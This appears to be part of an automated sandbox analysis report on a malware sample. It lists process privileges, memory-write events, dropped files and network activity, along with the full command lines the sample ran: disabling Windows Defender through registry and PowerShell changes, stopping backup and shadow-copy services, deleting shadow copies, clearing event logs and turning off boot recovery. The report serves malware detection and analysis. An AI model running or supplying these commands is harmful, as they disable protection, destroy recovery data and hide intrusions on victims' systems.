Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3440 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3052 wrote to memory of 3176 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3052 wrote to memory of 3176 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 4040 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4040 wrote to memory of 4080 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4040 wrote to memory of 4080 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4300 wrote to memory of 4252 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4300 wrote to memory of 4252 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4240 wrote to memory of 4376 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4240 wrote to memory of 4376 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 4432 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4432 wrote to memory of 4340 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4432 wrote to memory of 4340 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 4328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 4328 wrote to memory of 760 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4328 wrote to memory of 760 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3232 wrote to memory of 3808 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3232 wrote to memory of 3808 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 2136 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 2136 wrote to memory of 3272 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2136 wrote to memory of 3272 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3440 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\net.exe
PID 3268 wrote to memory of 644 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3268 wrote to memory of 644 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3440 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 3864 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\sc.exe
PID 3440 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe
PID 3440 wrote to memory of 4836 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12e93" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12e93" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12e93" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.12.18:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

memory/3052-115-0x0000000000000000-mapping.dmp

memory/3176-116-0x0000000000000000-mapping.dmp

memory/4040-117-0x0000000000000000-mapping.dmp

memory/4080-118-0x0000000000000000-mapping.dmp

memory/4300-119-0x0000000000000000-mapping.dmp

memory/4252-120-0x0000000000000000-mapping.dmp

memory/4240-121-0x0000000000000000-mapping.dmp

memory/4376-122-0x0000000000000000-mapping.dmp

memory/4432-123-0x0000000000000000-mapping.dmp

memory/4340-124-0x0000000000000000-mapping.dmp

memory/4328-125-0x0000000000000000-mapping.dmp

memory/760-126-0x0000000000000000-mapping.dmp

memory/3232-127-0x0000000000000000-mapping.dmp

memory/3808-128-0x0000000000000000-mapping.dmp

memory/2136-129-0x0000000000000000-mapping.dmp

memory/3272-130-0x0000000000000000-mapping.dmp

memory/3268-131-0x0000000000000000-mapping.dmp

memory/644-132-0x0000000000000000-mapping.dmp

memory/812-133-0x0000000000000000-mapping.dmp

memory/3864-134-0x0000000000000000-mapping.dmp

memory/1064-135-0x0000000000000000-mapping.dmp

memory/1276-136-0x0000000000000000-mapping.dmp

memory/1496-137-0x0000000000000000-mapping.dmp

memory/1704-138-0x0000000000000000-mapping.dmp

memory/1904-139-0x0000000000000000-mapping.dmp

memory/2160-140-0x0000000000000000-mapping.dmp

memory/2480-141-0x0000000000000000-mapping.dmp

memory/2688-142-0x0000000000000000-mapping.dmp

memory/2632-143-0x0000000000000000-mapping.dmp

memory/3124-144-0x0000000000000000-mapping.dmp

memory/2600-145-0x0000000000000000-mapping.dmp

memory/4836-146-0x0000000000000000-mapping.dmp

memory/1088-147-0x0000000000000000-mapping.dmp

memory/4960-148-0x0000000000000000-mapping.dmp

memory/4684-149-0x0000000000000000-mapping.dmp

memory/2980-150-0x0000000000000000-mapping.dmp

memory/4892-151-0x0000000000000000-mapping.dmp

memory/4588-152-0x0000000000000000-mapping.dmp

memory/4748-153-0x0000000000000000-mapping.dmp

memory/2956-154-0x0000000000000000-mapping.dmp

memory/5088-155-0x0000000000000000-mapping.dmp

memory/604-156-0x0000000000000000-mapping.dmp

memory/752-157-0x0000000000000000-mapping.dmp

memory/4604-158-0x0000000000000000-mapping.dmp

memory/4936-159-0x0000000000000000-mapping.dmp

memory/4496-160-0x0000000000000000-mapping.dmp

memory/2192-161-0x0000000000000000-mapping.dmp

memory/2008-162-0x0000000000000000-mapping.dmp

memory/3848-163-0x0000000000000000-mapping.dmp

memory/1940-164-0x0000000000000000-mapping.dmp

memory/2304-165-0x0000000000000000-mapping.dmp

memory/2812-166-0x0000000000000000-mapping.dmp

memory/3056-167-0x0000000000000000-mapping.dmp

memory/4732-168-0x0000000000000000-mapping.dmp

memory/2252-169-0x0000000000000000-mapping.dmp

memory/2316-170-0x0000000000000000-mapping.dmp

memory/3028-171-0x0000000000000000-mapping.dmp

memory/3724-172-0x0000000000000000-mapping.dmp

memory/3840-173-0x0000000000000000-mapping.dmp

memory/3280-174-0x0000000000000000-mapping.dmp

memory/5104-175-0x0000000000000000-mapping.dmp

memory/4120-176-0x0000000000000000-mapping.dmp

memory/2924-177-0x0000000000000000-mapping.dmp

memory/4004-178-0x0000000000000000-mapping.dmp

memory/520-179-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-180-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-181-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-182-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-183-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-184-0x00000168D5CC0000-0x00000168D5CE2000-memory.dmp

memory/520-185-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-186-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-187-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-188-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-189-0x00000168D7FA0000-0x00000168D8016000-memory.dmp

memory/520-190-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-194-0x00000168D5D40000-0x00000168D5D42000-memory.dmp

memory/520-196-0x00000168D5D43000-0x00000168D5D45000-memory.dmp

memory/520-198-0x00000168D5D46000-0x00000168D5D48000-memory.dmp

memory/520-217-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

memory/520-218-0x00000168BBEC0000-0x00000168BBEC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/2916-220-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-221-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-222-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-223-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-224-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-225-0x000001774D4D0000-0x000001774D4F2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6e54df56375acaede52048ff2649bac7
SHA1 fe2b2651742a059072d9bd875137d50232af1479
SHA256 7d7d9f0bdc84d4e934ae983ccc9c5b3339184f8237393dc1daffba4be48d72d1
SHA512 883e18d16a027b2272dbd4437bf078996edee77ff432679987551565c9f15da7b57c18c53429984a9038c654c2fbbbaf2cb8f080067e5c9cb6bb48000cd7d0c2

memory/2916-227-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-229-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-228-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-230-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-231-0x000001774F7A0000-0x000001774F816000-memory.dmp

memory/520-232-0x00000168D5D48000-0x00000168D5D49000-memory.dmp

memory/2916-233-0x000001774D5C0000-0x000001774D5C2000-memory.dmp

memory/2916-234-0x000001774D5C3000-0x000001774D5C5000-memory.dmp

memory/2916-235-0x0000017734E70000-0x0000017734E72000-memory.dmp

memory/2916-262-0x000001774D5C8000-0x000001774D5C9000-memory.dmp

